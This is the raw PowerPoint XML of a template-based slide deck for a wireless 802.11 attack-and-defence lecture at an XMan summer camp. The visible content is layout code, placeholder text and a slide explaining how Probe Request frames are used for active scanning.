                  <a:pt x="6726459" y="490004"/>
                  <a:pt x="6843084" y="534495"/>
                  <a:pt x="6932065" y="623477"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7110028" y="801440"/>
                  <a:pt x="7110028" y="1089975"/>
                  <a:pt x="6932065" y="1267938"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1992770" y="6207232"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1814808" y="6385196"/>
                  <a:pt x="1526273" y="6385196"/>
                  <a:pt x="1348309" y="6207232"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1170346" y="6029269"/>
                  <a:pt x="1170346" y="5740734"/>
                  <a:pt x="1348309" y="5562771"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6287604" y="623477"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6376585" y="534495"/>
                  <a:pt x="6493210" y="490004"/>
                  <a:pt x="6609834" y="490004"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5515052" y="478102"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5581110" y="478102"/>
                  <a:pt x="5647169" y="503302"/>
                  <a:pt x="5697569" y="553703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5798371" y="654505"/>
                  <a:pt x="5798371" y="817936"/>
                  <a:pt x="5697569" y="918738"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="365036" y="6251272"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="264234" y="6352073"/>
                  <a:pt x="100802" y="6352073"/>
                  <a:pt x="0" y="6251272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-100801" y="6150469"/>
                  <a:pt x="-100801" y="5987038"/>
                  <a:pt x="0" y="5886236"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5332534" y="553702"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5382935" y="503302"/>
                  <a:pt x="5448993" y="478101"/>
                  <a:pt x="5515052" y="478102"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4500043" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4616667" y="0"/>
                  <a:pt x="4733292" y="44491"/>
                  <a:pt x="4822273" y="133473"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5000237" y="311436"/>
                  <a:pt x="5000237" y="599971"/>
                  <a:pt x="4822273" y="777934"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1450376" y="4149832"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1272413" y="4327795"/>
                  <a:pt x="983878" y="4327795"/>
                  <a:pt x="805915" y="4149832"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="627951" y="3971869"/>
                  <a:pt x="627951" y="3683333"/>
                  <a:pt x="805915" y="3505370"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4177812" y="133473"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4266794" y="44491"/>
                  <a:pt x="4383418" y="0"/>
                  <a:pt x="4500043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8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="137919" y="6788509"/>
            <a:ext cx="6294300" cy="653822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782573" y="2543223"/>
            <a:ext cx="4511964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4200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Hairline"/>
                <a:cs typeface="Lato Hairline"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t>TITLE HERE</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0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782573" y="3127020"/>
            <a:ext cx="4511964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smtClean="0"/>
              <a:t>Break </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>Section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>Subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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6803034" y="3559596"/>
            <a:ext cx="4488039" cy="153686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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="144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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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3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4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4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10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0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hree Columns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sz="quarter" idx="48"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1610899" y="-1708902"/>
            <a:ext cx="9242753" cy="7509636"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6932065" h="6258030">
                <a:moveTo>
                  <a:pt x="6544742" y="2108199"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6661367" y="2108199"/>
                  <a:pt x="6777992" y="2152691"/>
                  <a:pt x="6866974" y="2241671"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7044937" y="2419635"/>
                  <a:pt x="7044937" y="2708170"/>
                  <a:pt x="6866974" y="2886133"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3495076" y="6258030"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3317113" y="6435994"/>
                  <a:pt x="3028578" y="6435994"/>
                  <a:pt x="2850615" y="6258030"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2672652" y="6080067"/>
                  <a:pt x="2672652" y="5791532"/>
                  <a:pt x="2850615" y="5613569"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6222513" y="2241671"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6311494" y="2152690"/>
                  <a:pt x="6428118" y="2108199"/>
                  <a:pt x="6544742" y="2108199"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6609834" y="490004"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6726459" y="490004"/>
                  <a:pt x="6843084" y="534495"/>
                  <a:pt x="6932065" y="623477"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7110028" y="801440"/>
                  <a:pt x="7110028" y="1089975"/>
                  <a:pt x="6932065" y="1267938"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1992770" y="6207232"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1814808" y="6385196"/>
                  <a:pt x="1526273" y="6385196"/>
                  <a:pt x="1348309" y="6207232"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1170346" y="6029269"/>
                  <a:pt x="1170346" y="5740734"/>
                  <a:pt x="1348309" y="5562771"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6287604" y="623477"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6376585" y="534495"/>
                  <a:pt x="6493210" y="490004"/>
                  <a:pt x="6609834" y="490004"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="5515052" y="478102"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5581110" y="478102"/>
                  <a:pt x="5647169" y="503302"/>
                  <a:pt x="5697569" y="553703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5798371" y="654505"/>
                  <a:pt x="5798371" y="817936"/>
                  <a:pt x="5697569" y="918738"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="365036" y="6251272"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="264234" y="6352073"/>
                  <a:pt x="100802" y="6352073"/>
                  <a:pt x="0" y="6251272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-100801" y="6150469"/>
                  <a:pt x="-100801" y="5987038"/>
                  <a:pt x="0" y="5886236"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5332534" y="553702"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5382935" y="503302"/>
                  <a:pt x="5448993" y="478101"/>
                  <a:pt x="5515052" y="478102"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="4500043" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4616667" y="0"/>
                  <a:pt x="4733292" y="44491"/>
                  <a:pt x="4822273" y="133473"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5000237" y="311436"/>
                  <a:pt x="5000237" y="599971"/>
                  <a:pt x="4822273" y="777934"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1450376" y="4149832"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1272413" y="4327795"/>
                  <a:pt x="983878" y="4327795"/>
                  <a:pt x="805915" y="4149832"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="627951" y="3971869"/>
                  <a:pt x="627951" y="3683333"/>
                  <a:pt x="805915" y="3505370"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4177812" y="133473"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4266794" y="44491"/>
                  <a:pt x="4383418" y="0"/>
                  <a:pt x="4500043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8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="1001518" y="5334424"/>
            <a:ext cx="6294300" cy="653822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7138173" y="3247495"/>
            <a:ext cx="4511964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4200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Hairline"/>
                <a:cs typeface="Lato Hairline"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t>TITLE HERE</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0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7138173" y="3831293"/>
            <a:ext cx="4511964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smtClean="0"/>
              <a:t>Break </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>Section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>Subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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7158634" y="4263868"/>
            <a:ext cx="4488039" cy="153686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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="144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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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3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4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4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10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0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hree Columns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/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="800771" y="3115671"/>
            <a:ext cx="6294300" cy="653822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ounded Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="2256987" y="3714319"/>
            <a:ext cx="4527448" cy="653822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ounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000" flipV="1">
            <a:off x="-292739" y="3248182"/>
            <a:ext cx="6422592" cy="370339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ounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="627181" y="2201944"/>
            <a:ext cx="4527448" cy="65382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 Placeholder 7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6782573" y="2543223"/>
            <a:ext cx="4511964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4200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lato Hairline"/>
                <a:cs typeface="Lato Hairline"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t>TITLE HERE</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7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6782573" y="3127020"/>
            <a:ext cx="4511964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baseline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smtClean="0"/>
              <a:t>Break </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>Section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>Subtitle</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 2"/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6803034" y="3559596"/>
            <a:ext cx="4488039" cy="153686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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="144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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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1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1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7" grpId="0" animBg="1"/>
      <p:bldP spid="6" grpId="0" animBg="1"/>
      <p:bldP spid="7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7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 showMasterSp="0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495CA-CB87-42F5-AD11-A63647B25AC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33C9F-EFB6-4360-A5D6-81DD839FD7B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 showMasterSp="0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495CA-CB87-42F5-AD11-A63647B25AC0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33C9F-EFB6-4360-A5D6-81DD839FD7B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 showMasterSp="0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495CA-CB87-42F5-AD11-A63647B25AC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33C9F-EFB6-4360-A5D6-81DD839FD7B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 showMasterSp="0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495CA-CB87-42F5-AD11-A63647B25AC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33C9F-EFB6-4360-A5D6-81DD839FD7B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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme1.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpeg"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.jpeg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout56.xml"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout54.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout53.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout52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" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4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0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" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout29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7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3495CA-CB87-42F5-AD11-A63647B25AC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333C9F-EFB6-4360-A5D6-81DD839FD7B7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4" y="0"/>
            <a:ext cx="12179586" cy="685958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3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2007/relationships/media" Target="../media/media1.mp3"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/audio" Target="../media/media1.mp3"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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21.png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30.jpeg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6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1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36.png"/><Relationship Id="rId1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38.png"/><Relationship Id="rId1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42.png"/><Relationship Id="rId1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14.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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43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44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45.jpe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46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8.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4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6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0.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.pn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1.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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image" Target="../media/image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6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1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14.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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图片 28" descr="图片包含 星, 户外艺术系列&#10;&#10;已生成高可信度的说明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376484" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="矩形 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2662705" y="2873067"/>
            <a:ext cx="7592695" cy="9220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5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无线网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5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en-US" altLang="zh-CN" sz="5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802.11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5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攻与防</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5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1664368" y="2102073"/>
            <a:ext cx="9232232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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>第三届</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XMan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>夏令营</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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1664368" y="4637202"/>
            <a:ext cx="9232232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讲师：</a:t>
            </a:r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icecolor</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1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 algn="ctr"/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网络尖刀核心成员</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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 algn="ctr"/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赛宁攻防实验室</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="计划书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>
                  <p14:fade in="500.000000" out="500.00000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195848" y="185496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0">
        <p15:prstTrans prst="fallOver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 tmFilter="0,0; .5, 1; 1, 1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151"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16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651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151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2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5"/>
                </p:tgtEl>
              </p:cMediaNode>
            </p:audio>
          </p:childTnLst>
        </p:cTn>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="36" grpId="1"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="3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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ProbeRequest Frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg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42925" y="1651635"/>
            <a:ext cx="4681855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主动扫描</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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无线客户端工作过程中，会定期地搜索周围的无线网络，也就是主动扫描周围的无线网络。它会每隔一段时间发送(Probe Request帧)来扫描无线网络，来询问是否有AP进行回应。是否携带指定SSID，可以将主动扫描可以分为两种：携带与不携带</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
